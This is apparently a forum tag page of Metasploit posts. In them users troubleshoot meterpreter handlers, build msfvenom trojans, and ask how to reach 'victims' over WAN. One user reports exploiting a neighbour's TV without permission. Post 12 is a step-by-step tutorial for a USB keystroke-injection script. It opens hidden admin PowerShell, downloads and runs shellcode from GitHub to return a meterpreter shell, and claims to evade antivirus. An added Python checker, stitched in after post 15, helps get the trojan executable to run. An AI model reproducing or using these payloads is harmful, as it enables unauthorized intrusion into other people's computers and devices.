Showing results for tags 'metasploit'.
  1. Hope someone can help me. I used CVE-2017-0785 to exploit my neighbour's SmartTV. It gave me this output:
     sudo python CVE-2017-0785.py TARGET=CC:B1:1A:F6:D7:76
     [!] Pwntools does not support 32-bit Python. Use a 64-bit release.
     [+] Exploit: Done
     00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│
     *
     00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 01 │····│····│····│····│
     00000030 b5 69 01 00 b4 8f e9 c0 00 00 00 00 b5 54 fe a3 │·i··│····│····│·T··│
     00000040 00 00 00 06 b5 69 39 70 b4 8f e9 e0 b5 60 61 38 │····│·i9p│····│·`a8│
     00000050 b5 60 61 38 b5 69 39 70 b5 69 39 64 b5 69 5a a4 │·`a8│·i9p│·i9d│·iZ·│
     00000060 b4 8f e9 f8 00 00 00 00 b5 69 5a a4 00 00 00 41 │····│····│·iZ·│···A│
     00000070 b4 8f eb 84 b5 54 e6 f9 b5 60 61 38 b5 69 41 78 │····│·T··│·`a8│·iAx│
     00000080 b4 8f ea 08 b5 56 e0 4f b4 8f ea 10 b5 54 57 fd │····│·V·O│····│·TW·│
     00000090 00 00 00 00 b5 69 41 60 b5 56 79 59 b5 69 39 64 │····│·iA`│·VyY│·i9d│
     000000a0 b4 8f ea 30 00 00 00 18 b4 8f ea d0 b5 54 ca c3 │···0│····│····│·T··│
     000000b0 b5 69 41 60 00 00 00 05 b5 60 61 38 b4 8f ea 58 │·iA`│····│·`a8│···X│
     000000c0 00 00 00 18 b4 8f ea d0 b5 69 39 64 b5 54 d2 bf │····│····│·i9d│·T··│
     000000d0 00 00 00 00 b4 30 04 90 00 00 00 00 42 27 e0 00 │····│·0··│····│B'··│
     000000e0 00 00 00 00 b5 69 39 64 00 00 00 08 00 00 00 01 │····│·i9d│····│····│
     000000f0 b4 30 04 90 b4 8f ea d0 00 00 00 41 b5 69 39 64 │·0··│····│···A│·i9d│
     00000100 b4 8f ea a8 b5 69 41 60 00 00 00 03 b5 69 39 64 │····│·iA`│····│·i9d│
     00000110 b5 60 61 38 b4 30 c8 d8 b4 8f ea a0 b5 56 e0 4f │·`a8│·0··│····│·V·O│
     00000120 b4 8f ea a8 b5 56 f6 21 b4 30 c8 d8 41 02 6f 10 │····│·V·!│·0··│A·o·│
     00000130 b4 8f ea b8 b5 50 a1 b7 21 00 00 14 0e 0a 24 00 │····│·P··│!···│··$·│
     00000140 b5 60 61 38 b5 69 ab 60 b4 8f ea d0 b5 56 e0 4f │·`a8│·i·`│····│·V·O│
     00000150 b4 8f ea d8 b5 69 ab 58 b3 6d d4 87 00 00 00 00 │····│·i·X│·m··│····│
     00000160 b4 8f ea f8 00 00 00 02 00 00 00 10 b3 6d f4 b0 │····│····│····│·m··│
     00000170 b5 60 61 38 b5 56 d2 45 b4 8f eb 10 00 00 00 00 │·`a8│·V·E│····│····│
     00000180 b5 69 5a a4 00 00 00 41 00 00 00 13 b5 54 e6 f9 │·iZ·│···A│····│·T··│
     00000190 b4 8f ed 24 b5 69 41 60 b5 60 61 38 b4 8f eb 30 │···$│·iA`│·`a8│···0│
     000001a0 00 00 00 19 b4 8f ed 24 00 00 00 41 b5 54 9f 4b │····│···$│···A│·T·K│
     000001b0 00 00 00 00 b5 69 41 60 b5 60 61 38 00 00 00 64 │····│·iA`│·`a8│···d│
     000001c0 b4 8f eb 48 b5 56 e0 4f b4 8f eb 50 b5 56 ef 31 │···H│·V·O│···P│·V·1│
     000001d0 b5 60 61 38 b5 69 ab 60 b5 60 61 38 b5 69 ab 60 │·`a8│·i·`│·`a8│·i·`│
     000001e0 b4 8f eb 68 b5 56 e0 4f b4 8f eb 70 b5 54 57 fd │···h│·V·O│···p│·TW·│
     000001f0 b5 69 ab 58 b4 8f ed 24 00 00 00 41 b5 69 ab 10 │·i·X│···$│···A│·i··│
     00000200 b4 8f eb 90 00 00 00 0f b4 8f ed 24 b5 56 82 8b │····│····│···$│·V··│
     00000210 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│
     00000220 b5 60 61 38 b5 60 61 38 b3 6e 95 b8 00 00 00 41 │·`a8│·`a8│·n··│···A│
     00000230 b4 8f eb c8 00 00 00 41 b3 6e 95 b8 b5 60 61 38 │····│···A│·n··│·`a8│
     00000240 b3 6e b5 f0 b5 56 79 25 b5 56 78 bd b5 69 41 60 │·n··│·Vy%│·Vx·│·iA`│
     00000250 b5 69 39 64 00 00 00 14 b4 8f eb e0 b5 54 cd db │·i9d│····│····│·T··│
     00000260 b5 56 79 59 b5 69 39 64 b4 8f eb f0 b5 54 c9 f5 │·VyY│·i9d│····│·T··│
     00000270 b5 69 41 60 b5 69 41 60 00 00 00 06 b5 60 61 38 │·iA`│·iA`│····│·`a8│
     00000280 b4 8f ec 18 00 00 00 14 b3 6e f6 60 b5 54 d2 13 │····│····│·n·`│·T··│
     00000290 b5 54 da cd b5 69 41 60 00 00 00 00 b5 69 39 64 │·T··│·iA`│····│·i9d│
     000002a0 b4 8f ec 38 00 00 00 00 00 00 00 00 b5 60 00 00 │···8│····│····│·`··│
     000002b0 b5 60 61 38 b3 6f 16 a0 00 00 00 41 00 00 00 0f │·`a8│·o··│···A│····│
     000002c0 b4 8f ec 68 00 00 00 0f b3 6f 16 a8 b5 60 61 38 │···h│····│·o··│·`a8│
     000002d0 b3 6f 36 d0 b5 54 6e 5d 00 00 00 00 ff ff ff ff │·o6·│·Tn]│····│····│
     000002e0 00 00 00 00 b5 68 13 71 00 00 00 0c b5 69 39 70 │····│·h·q│····│·i9p│
     000002f0 00 00 00 0e b5 5d 62 84 b5 5d 62 c0 b5 5d 62 e0 │····│·]b·│·]b·│·]b·│
     00000300 b5 5d 63 10 b5 5d 63 3c b5 5d 63 68 00 00 00 41 │·]c·│·]c<│·]ch│···A│
     00000310 b3 6c 82 1c 00 00 00 01 00 00 00 00 b3 6c 82 36 │·l··│····│····│·l·6│
     00000320 b4 8f ed 24 00 00 00 41 b3 6c 82 36 00 00 00 00 │···$│···A│·l·6│····│
     00000330 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│
     00000340 00 00 00 00 b5 60 61 38 b5 60 61 38 b5 69 39 70 │····│·`a8│·`a8│·i9p│
     00000350 b5 69 39 64 b5 69 5a a4 b4 8f ec f0 00 00 00 00 │·i9d│·iZ·│····│····│
     00000360 b5 69 5a a4 b4 31 15 07 b5 69 39 70 b5 54 e6 f9 │·iZ·│·1··│·i9p│·T··│
     00000370 b5 69 39 64 00 00 00 02 b5 69 5a a4 b4 8f ed 20 │·i9d│····│·iZ·│··· │
     00000380 b4 31 15 07 00 00 00 0c b4 31 15 07 b5 54 ea 59 │·1··│····│·1··│·T·Y│
     00000390 00 00 00 00 00 00 00 00 00 00 00 00 41 02 6f 10 │····│····│····│A·o·│
     000003a0 b5 5d 88 94 b5 5d 88 5c b4 8f f8 f0 b5 69 f7 20 │·]··│·]·\│····│·i· │
     000003b0 00 00 02 e9 42 2b d0 10 00 00 01 74 00 00 00 00 │····│B+··│···t│····│
     000003c0 b4 8f ed 58 00 00 00 00 b4 8f ed 50 00 00 00 81 │···X│····│···P│····│
     000003d0 42 2b cc 60 b4 8f ed 60 00 00 00 00 00 00 00 00 │B+·`│···`│····│····│
     000003e0 00 00 00 00 b5 69 f7 20 b5 69 f6 d4 00 00 00 00 │····│·i· │·i··│····│
     000003f0 b4 8f ed 78 b5 69 f6 b0 00 00 00 00 00 00 ff ff │···x│·i··│····│····│
     00000400 b4 8f ed 98 b4 8f ed 90 b4 8f f8 f0 0e 0a 24 00 │····│····│····│··$·│
     00000410 b4 8f ed 98 │····││
     00000414
     Who knows what to do now with this code?
  2. Hi guys, anyone know how I can get shell access using any modern browser (Chrome, IE, Firefox, etc., so that the browser doesn't bitch at me and say I need to upgrade to the latest browser version) by browsing to a URL? I tried putting a malicious iframe on my evil portal and using these exploits: auxiliary/server/browser_autopwn, auxiliary/server/browser_autopwn2. I even tried downgrading to IE 8 and then using the exploit exploit/windows/browser/ms10_002_aurora. But so far I got nothing. :( No meterpreter sessions. This is for a presentation, by the way. Can any of you guys suggest a different way? I am desperate. Wait, not really. Just really frustrated. Hope someone can help. Thanks in advance!
  3. Hello, I have a problem. I don't know how to set up a database for Metasploit.
     msf > db_status
     postgresql selected, no connection
     /opt/metasploit-framework/embedded/framework/lib/rex/ui/text/shell.rb:210:in `initialize': Permission denied @ rb_sysopen - /Users/jiminsha/.msf4/history (Errno::EACCES)
     from /opt/metasploit-framework/embedded/framework/lib/rex/ui/text/shell.rb:210:in `open'
     from /opt/metasploit-framework/embedded/framework/lib/rex/ui/text/shell.rb:210:in `run'
     from /opt/metasploit-framework/embedded/framework/lib/metasploit/framework/command/console.rb:48:in `start'
     from /opt/metasploit-framework/embedded/framework/lib/metasploit/framework/command/base.rb:82:in `start'
     from /opt/metasploit-framework/bin/../embedded/framework/msfconsole:48:in `<main>'
     I am on Mac... that is why I can't find any tutorial. Please help.
  5. Bro, I made a payload in Metasploit using ngrok without port forwarding so that I can go WAN, but in ngrok the port gets changed every time I open it, so I need to make the payload again and again and send it to the victim. Is there any way I can overcome this?
  6. Hi guys, I can't figure out what I am doing wrong or if there is something wrong with my Metasploit setup (v4.16.7). I have created a basic reverse_tcp payload with msfvenom; when I start my listener I do the following:
     msf > use exploit/multi/handler
     msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
     payload => windows/meterpreter/reverse_tcp
     msf exploit(handler) > set LHOST 192.168.0.8
     LHOST => 192.168.0.8
     msf exploit(handler) > set LPORT 4444
     LPORT => 4444
     msf exploit(handler) > exploit
     [*] Exploit running as background job 0.
     [*] Started reverse TCP handler on 192.168.0.8:4444
     msf exploit(handler) >
     [*] Sending stage (179267 bytes) to 192.168.0.7
     [*] Meterpreter session 1 opened (192.168.0.8:4444 -> 192.168.0.7:50298) at 2017-10-25 16:05:13 -0400
     I am expecting to see a meterpreter but nothing... What's weird is I have watched a few tutorials and after typing exploit the console "waits" for the payload to be executed; once that happens the interpreter appears. But after I type exploit the console does not wait, I go straight back to msf exploit(handler) >. Any help much appreciated.
  7. I just created a sample Android backdoor called apkgue.apk; after I run it on my phone (Android) I'm stuck at the next step: the meterpreter > prompt doesn't show. Why? Any help for me? Thanks.
     msf > ./msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.128 LPORT=3344 R > apkgue.apk
     [*] exec: ./msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.128 LPORT=3344 R > apkgue.apk
     No platform was selected, choosing Msf::Module::Platform::Android from the payload
     No Arch selected, selecting Arch: dalvik from the payload
     No encoder or badchars specified, outputting raw payload
     Payload size: 8809 bytes
     msf > use exploit/multi/handler
     msf exploit(handler) > set payload android/meterpreter/reverse_tcp
     payload => android/meterpreter/reverse_tcp
     msf exploit(handler) > set lhost 192.168.43.128
     lhost => 192.168.43.128
     msf exploit(handler) > set lport 3344
     lport => 3344
     msf exploit(handler) > show options
     Module options (exploit/multi/handler):
        Name  Current Setting  Required  Description
        ----  ---------------  --------  -----------
     Payload options (android/meterpreter/reverse_tcp):
        Name   Current Setting  Required  Description
        ----   ---------------  --------  -----------
        LHOST  192.168.43.128   yes       The listen address
        LPORT  3344             yes       The listen port
     Exploit target:
        Id  Name
        --  ----
        0   Wildcard Target
     msf exploit(handler) > exploit
     [*] Exploit running as background job 0.
     [*] Started reverse TCP handler on 192.168.43.128:3344
     msf exploit(handler) >
     [*] Sending stage (69089 bytes) to 192.168.43.1
     [*] Meterpreter session 1 opened (192.168.43.128:3344 -> 192.168.43.1:44411) at 2017-10-19 23:02:02 +0700
  8. Hey, just wondering if anyone can offer some advice. I am new to hacking and am loving it so far. I have started doing a hacking course I found online, but I have run into a wall. Whenever I go to run an exploit I always get the error "multi handler failure to bind or bad config". I have searched and there are a million different opinions. I have tried changing the ports apache2 listens on. I have reinstalled Kali multiple times. I have tried it in a VM and as my OS. I have changed the settings in my VM from NAT to NAT network and even bridged. And I have run out of ideas. Any advice would be greatly appreciated.
  9. Hi! I'm trying to get into a Windows 10 x64 computer on the same LAN as an x86 PC with Kali Linux. Once I finally get into the target PC (W10) and the meterpreter session is open, the meterpreter session command prompt doesn't appear, I mean, I don't get the meterpreter > command prompt... What am I doing wrong? Thanks!!
  10. Hey, I'm reading the book Metasploit: The Penetration Tester's Guide, and in it the author mentions that in general you should not set the THREADS value in Metasploit to more than 16 on Windows machines and more than 128 on UNIX-style machines. I'm just curious as to why, and also why so few on Windows? Later in the book the author also uses 255 threads for a port scan. Thanks.
  11. Hello everyone, I have successfully used Metasploit to hack Android on LAN using my own Android hotspot connection. Now I want to know how to use Metasploit over WAN using the same. I can only connect my Kali machine to my Android hotspot connection for Internet connectivity. I have searched over the net; there are solutions like SSH tunneling and port forwarding from your Android. Some are saying that your ISP must have blocked the LPORT that you have used. Some are suggesting using a VPN. I am really confused what to do; can anyone help me out?
  12. Hello again friends! Today I will give a tutorial on how to create a payload that executes in under 10 seconds and gives you a fully functioning meterpreter shell back to your Kali Linux machine. This is done in under 20 lines of script. It's quite simple and works on any Windows machine with PowerShell installed (Windows 7 and above comes with this preinstalled). I tested this first on my Windows 10 machine and it works like a charm, fully undetected by antivirus since it writes the script to memory, not to the disk. Let's begin, shall we?
      Step 1: Fire up Kali Linux and open a terminal. Using msfvenom we are going to create a shellcode. Enter this code:
      msfvenom -p windows/x64/meterpreter/reverse_https LHOST=XXX LPORT=XXX -f powershell > /root/Desktop/shellcode.txt
      The first part, "msfvenom", indicates that we are using that specific tool. The -p parameter indicates what payload we are using. Change the "XXX" for the LHOST parameter to your Kali Linux machine's IP; open a terminal and enter "ifconfig" if you are unsure. As for LPORT, you can use whatever you want. Typically you use 443, 8080 or 4444. They all work. The -f parameter writes the shellcode in PowerShell format (obviously, since we're using PowerShell). And the last part after the ">" indicates the location where this payload will be saved.
      Step 2: Now we are going to upload the shellcode to GitHub or Pastebin (whichever you prefer). Create a GitHub account if you do not have one at https://github.com/join?source=header-home. After doing that, make a new repository on GitHub and then upload the payload you just made (there are tutorials on Google for uploading files). You can upload the file a couple of different ways. The easiest is to just log on to GitHub from your Kali machine and upload from there. Or you can save the payload on a USB stick or somehow transfer it to your host machine and upload from there. Or if you use Pastebin, upload to that!
      Step 3: Now the fun part! Time to code the Ducky. Copy and paste my code and change the corresponding lines.
      DELAY 500
      GUI x
      DELAY 1000
      a
      DELAY 1000
      ALT y
      DELAY 1000
      STRING powershell -WindowStyle hidden
      ENTER
      DELAY 1000
      STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1')
      ENTER
      DELAY 1000
      STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/GunZofPeace/PowerSploit/master/Scripts/Meterp')
      ENTER
      DELAY 1000
      STRING Invoke-Shellcode -Shellcode ($buf) -Force
      ENTER
      What is going on here is we are pressing Windows + X, then typing "a", which opens the CMD with admin privileges. Which is awesome for us. It then fires up the command to start PowerShell, BUT IT OPENS IT HIDDEN. So the actual PowerShell window is hidden!!!!!!! The only way to see it is running is through Task Manager. Which is good for us :) After PowerShell is started up, it downloads the command "Invoke-Shellcode" and injects it into memory. Which doesn't do much by itself. You want to keep this line the same as mine! Copy and paste it exactly. Only for the first IEX string. Now, for the second IEX string, you want to replace the last link with whatever the link to your script is on your GitHub account. Remember the one you uploaded? You want to click on GitHub the button that says "Raw" and get that link! Then replace it between the two apostrophes. Or if you used Pastebin, just place that link into the code. Lastly, the last line of code actually executes the payload and this is where you get your shell back on your listener.
      To set up the listener, open up a terminal in Kali:
      > msfconsole
      > use exploit/multi/handler
      > set payload windows/x64/meterpreter/reverse_https
      > set LHOST XXX (whatever IP you used, which would be your Kali machine IP)
      > set LPORT XXX (whatever port you used)
      > exploit
      And there you go! Of course, have your listener up before doing the attack. If you have any questions, please comment! This is my first actual tutorial, so feedback is wanted.
  13. Hello. I was messing around with Metasploit. I'm using Armitage. Everything worked fine before. I created a new payload and the old one stopped getting a stage. It just hangs at "Starting the payload handler...". The new one works fine. Need help fixing it please. Here's the Armitage log:
      msf > use exploit/multi/handler
      msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
      PAYLOAD => windows/meterpreter/reverse_tcp
      msf exploit(handler) > set LHOST PUBLIC IP
      LHOST => PUBLIC IP
      msf exploit(handler) > set LPORT 4443
      LPORT => 4443
      msf exploit(handler) > set Encoder x86/shikata_ga_nai
      Encoder => x86/shikata_ga_nai
      msf exploit(handler) > set EXITFUNC process
      EXITFUNC => process
      msf exploit(handler) > set ExitOnSession false
      ExitOnSession => false
      msf exploit(handler) > set Iterations 3
      Iterations => 3
      msf exploit(handler) > exploit -j
      [*] Exploit running as background job.
      [*] Started reverse TCP handler on PUBLIC IP:4443
      [*] Starting the payload handler...
  14. Hi guys, I'm just curious whether there is any way to get a reverse shell or to host things on the network without using a router. Well, I want to know whether we can find alternatives to port forwarding, like tunneling, for example reverse SSH tunneling and VPN gateways, blah blah blah. I want a solution for this stuff. Please guys, help me make it out! I'm having a mobile with a 4G Internet connection. I'm connecting my laptop to the Internet via USB tethering; my laptop also has a WiFi interface in case you can suggest alternatives! I want a way to pentest on the WAN with my mobile USB tethering! THANKS Hak5!
  15. I'm trying to create a Windows executable meterpreter payload using msfvenom to execute on my own computer running Windows 7 64-bit. I've tried using the following commands to produce the executable:
      1.) msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.112 LPORT=4444 -f exe > trojan.exe
      2.) msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.112 LPORT=4444 -f exe > trojan.exe
      3.) msfvenom -p windows/x64/meterpreter/reverse_tcp -a x64 --platform windows LHOST=192.168.0.112 LPORT=4444 -f exe > trojan.exe
      4.) msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.112 LPORT=4444 -k -f exe > trojan.exe
      I've also tried using encoders and other payloads. I tried running the executables on multiple Windows 7 64-bit computers, but all I got was this message: "The version of this file is not compatible with the version of Windows you're running. Check your computer's system information to see whether you need an x86 (32-bit) or x64 (64-bit) version of the program, and then contact the software publisher." When I tried running it in the command prompt it showed me this: Unsupported 16-Bit Application. "The program or feature cannot start or run due to incompatibility with 64-bit versions of Windows. Please contact the software vendor to ask if a 64-bit Windows compatible version is available." I'm running Metasploit Framework on both Linux Mint and Kali Linux. I've port forwarded the port, tried changing the IP address, turned off all firewalls and AV software, as well as reinstalling Linux Mint and Kali Linux and updating them plus Metasploit Framework. I've tried Google to find a solution, but so far I haven't found it. Any ideas on this problem? Any help would be appreciated.
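Both messages quoted in the post above are what Windows gives for a file named .exe that carries no valid PE header at all: with no `PE\0\0` signature behind the DOS header the loader falls back to treating the file as a 16-bit DOS program, which 64-bit Windows cannot run. So before swapping payloads or encoders, check what the file actually contains. The Python below is an added example for this page, not code from the post or from Metasploit: it follows `e_lfanew` from the DOS header to the PE signature and reports the declared machine type and whether the optional header is PE32 or PE32+, and it recognises the common failure where text (msfvenom's status messages, or a shell error) ended up in the file instead of the payload. The sample inputs are constructed here: a hand-built minimal PE header and a byte string of msfvenom's "No platform was selected" message.

```python
import struct

MACHINE_NAMES = {0x014C: "x86", 0x8664: "x64", 0x01C0: "ARM", 0xAA64: "ARM64"}
PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B

# Constructed sample: msfvenom's status text, which lands in the output file if it is
# captured together with the payload (for example with stderr merged into the redirect).
CAPTURED_TEXT = b"No platform was selected, choosing Msf::Module::Platform::Windows from the payload\n"


def build_minimal_pe(machine, pe32plus):
    """Constructed sample: DOS header, PE signature, COFF header and the optional-header magic only."""
    e_lfanew = 0x40
    dos_header = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff_header = struct.pack(
        "<HHIIIHH",
        machine,                    # Machine
        1,                          # NumberOfSections
        0, 0, 0,                    # TimeDateStamp, PointerToSymbolTable, NumberOfSymbols
        240 if pe32plus else 224,   # SizeOfOptionalHeader
        0x0022 if pe32plus else 0x0102,  # Characteristics (EXECUTABLE_IMAGE plus LARGE_ADDRESS_AWARE or 32BIT_MACHINE)
    )
    optional_magic = struct.pack("<H", PE32PLUS_MAGIC if pe32plus else PE32_MAGIC)
    return dos_header + b"PE\0\0" + coff_header + optional_magic


def inspect_pe(data):
    """Describe what kind of executable the bytes are, or why Windows will not load them."""
    if not data:
        return {"valid": False, "reason": "empty file"}
    if data[:2] != b"MZ":
        try:
            head = data[:60].decode("ascii")
            is_text = all(ch.isprintable() or ch in "\r\n\t" for ch in head)
        except UnicodeDecodeError:
            is_text = False
        if is_text:
            return {"valid": False, "reason": f"starts with text, not an executable: {head.strip()!r}"}
        return {"valid": False, "reason": "no MZ header"}
    if len(data) < 0x40:
        return {"valid": False, "reason": "truncated DOS header"}
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 26 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return {"valid": False, "reason": "no PE signature; Windows treats this as a 16-bit DOS program"}
    machine = struct.unpack_from("<H", data, e_lfanew + 4)[0]
    magic = struct.unpack_from("<H", data, e_lfanew + 24)[0]
    pe32plus = magic == PE32PLUS_MAGIC
    arch = MACHINE_NAMES.get(machine, f"unknown({machine:#06x})")
    consistent = pe32plus == (machine in (0x8664, 0xAA64))
    reason = f"{arch} {'PE32+' if pe32plus else 'PE32'} image"
    if not consistent:
        reason += " (machine field and optional-header magic disagree)"
    return {"valid": True, "machine": machine, "arch": arch, "pe32plus": pe32plus, "reason": reason}


def inspect_file(path):
    """Same check on a file on disk, for example the trojan.exe produced by msfvenom."""
    with open(path, "rb") as fh:
        return inspect_pe(fh.read(4096))


if __name__ == "__main__":
    for sample in (build_minimal_pe(0x014C, False), build_minimal_pe(0x8664, True), CAPTURED_TEXT):
        print(inspect_pe(sample)["reason"])
```

Both an x86 PE32 and an x64 PE32+ image run on 64-bit Windows 7 (the former under WoW64), so if the check reports a valid image the loader message is not about bitness and the problem lies elsewhere. If it reports text or a missing PE signature, regenerate with `-f exe` and make sure nothing but the raw payload is written to the redirected output; the same check applies to the post above that ran `msfvenom ... R > apkgue.apk` from inside msfconsole, where the redirect is interpreted by the console's `exec` wrapper rather than by a shell.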
  16. I am fuzzing around with Metasploitable and I ran a vulnerability scan with Nessus. I obviously got a bunch of critical vulnerabilities, but I am clueless about what they are and how the exploit works. I did Google it, but their explanations are rather vague or just too complex for me to understand (I am a stereotypical script kiddie, feel free to call me dumb). Can someone please tell me how and where I can search for more about the vulnerability and the exploit? Often the exploits are written in Ruby (or languages that I am not fluent in; even the pros aren't good in every language, are they?) and I am just starting to learn it. (I am good in Python though; I can understand most of the code.) I am reading networking books alongside and am good with Linux. Other than researching exploits and vulnerabilities, can you explain how you got into and got better at penetration testing? Thank you.
  17. Hi, I have been tasked with trying to figure out if the systems we use have any vulnerabilities. I need to set up a generic-looking website that will look at the browser, OS, etc. that the visitor to the site is using and list known vulnerabilities. The only thing I have found so far is Autopwn2 in Metasploit. It seems to be very limited, in that you have the browser go to a specific URL that will then go through a list of known vulnerabilities and, when it finds one, try to attack the browser. What I want is: 1) to have a much larger list and try all of them; 2) to NOT attack the browser. I simply want a list of the vulnerabilities this browser, OS, etc. has and what my options are. Any advice?
  18. Hi everybody! I'm trying to use the WordPress long password DoS auxiliary in Metasploit, but it keeps getting some bad-ass error. About a month ago I was still using Ubuntu and this module was working so good, but since I moved to Kali I'm having trouble with it. [Forgive me for my fucked-up English.] These are the error(s):
      [*] Checking if user "admin" exists...
      [+] Username "admin" is valid
      [-] Auxiliary failed: ActiveRecord::StatementInvalid PG::InvalidTextRepresentation: ERROR: invalid input syntax for type inet: "myhost(that i set for rhost)" : SELECT "hosts".* FROM "hosts" WHERE "hosts"."address" = $1 AND "hosts"."workspace_id" = $2 ORDER BY "hosts"."id" ASC LIMIT 1
      [-] Call stack:
      [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord-4.2.7.1/lib/active_record/connection_adapters/postgresql_adapter.rb:602:in `exec_prepared'
      [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord-4.2.7.1/lib/active_record/connection_adapters/postgresql_adapter.rb:602:in `block in exec_cache'
      [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord-4.2.7.1/lib/active_record/connection_adapters/abstract_adapter.rb:484:in `block in log'
      [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activesupport-4.2.7.1/lib/active_support/notifications/instrumenter.rb:20:in `instrument'
      [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord-4.2.7.1/lib/active_record/connection_adapters/abstract_adapter.rb:478:in `log'
      [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord-4.2.7.1/lib/active_record/connection_adapters/postgresql_adapter.rb:601:in `exec_cache'
      [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord-4.2.7.1/lib/active_record/connection_adapters/postgresql_adapter.rb:585:in `execute_and_clear'
      [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord-4.2.7.1/lib/active_record/connection_adapters/postgresql/database_statements.rb:160:in `exec_query'
      [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord-4.2.7.1/lib/active_record/connection_adapters/abstract/database_statements.rb:356:in `select'
      [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord-4.2.7.1/lib/active_record/connection_adapters/abstract/database_statements.rb:32:in `select_all'
      [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord-4.2.7.1/lib/active_record/connection_adapters/abstract/query_cache.rb:70:in `select_all'
      [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord-4.2.7.1/lib/active_record/querying.rb:39:in `find_by_sql'
      [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord-4.2.7.1/lib/active_record/relation.rb:639:in `exec_queries'
      [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord-4.2.7.1/lib/active_record/relation.rb:515:in `load'
      [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord-4.2.7.1/lib/active_record/relation.rb:243:in `to_a'
      [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord-4.2.7.1/lib/active_record/relation/finder_methods.rb:500:in `find_nth_with_limit'
      [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord-4.2.7.1/lib/active_record/relation/finder_methods.rb:484:in `find_nth'
      [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord-4.2.7.1/lib/active_record/relation/finder_methods.rb:127:in `first'
      [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord-4.2.7.1/lib/active_record/relation.rb:155:in `first_or_create'
      [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/metasploit-credential-2.0.5/lib/metasploit/credential/creation.rb:555:in `create_credential_service'
      [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/metasploit-credential-2.0.5/lib/metasploit/credential/creation.rb:423:in `create_credential_origin_service'
      [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/metasploit-credential-2.0.5/lib/metasploit/credential/creation.rb:353:in `create_credential_origin'
      [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/metasploit-credential-2.0.5/lib/metasploit/credential/creation.rb:117:in `create_credential'
      [-] /usr/share/metasploit-framework/lib/msf/core/auxiliary/report.rb:34:in `create_credential'
      [-] /usr/share/metasploit-framework/modules/auxiliary/dos/http/wordpress_long_password_dos.rb:88:in `report_cred'
      [-] /usr/share/metasploit-framework/modules/auxiliary/dos/http/wordpress_long_password_dos.rb:100:in `user_exists'
      [-] /usr/share/metasploit-framework/modules/auxiliary/dos/http/wordpress_long_password_dos.rb:119:in `run'
      [*] Auxiliary module execution completed
  19. Whenever I type the following:
      pc@pc-eME732Z ~/Downloads/metasploit-framework-master $ msfconsole
      /var/lib/gems/2.3.0/gems/activesupport-4.2.7.1/lib/active_support/dependencies.rb:274:in `require': cannot load such file -- robots (LoadError)
      from /var/lib/gems/2.3.0/gems/activesupport-4.2.7.1/lib/active_support/dependencies.rb:274:in `block in require'
      from /var/lib/gems/2.3.0/gems/activesupport-4.2.7.1/lib/active_support/dependencies.rb:240:in `load_dependency'
      from /var/lib/gems/2.3.0/gems/activesupport-4.2.7.1/lib/active_support/dependencies.rb:274:in `require'
      from /opt/metasploit-framework/lib/metasploit/framework.rb:18:in `<top (required)>'
      from /opt/metasploit-framework/lib/metasploit/framework/database.rb:1:in `require'
      from /opt/metasploit-framework/lib/metasploit/framework/database.rb:1:in `<top (required)>'
      from /opt/metasploit-framework/lib/metasploit/framework/parsed_options/base.rb:17:in `require'
      from /opt/metasploit-framework/lib/metasploit/framework/parsed_options/base.rb:17:in `<top (required)>'
      from /opt/metasploit-framework/lib/metasploit/framework/parsed_options/console.rb:2:in `require'
      from /opt/metasploit-framework/lib/metasploit/framework/parsed_options/console.rb:2:in `<top (required)>'
      from /var/lib/gems/2.3.0/gems/activesupport-4.2.7.1/lib/active_support/inflector/methods.rb:263:in `require'
      from /var/lib/gems/2.3.0/gems/activesupport-4.2.7.1/lib/active_support/inflector/methods.rb:263:in `const_get'
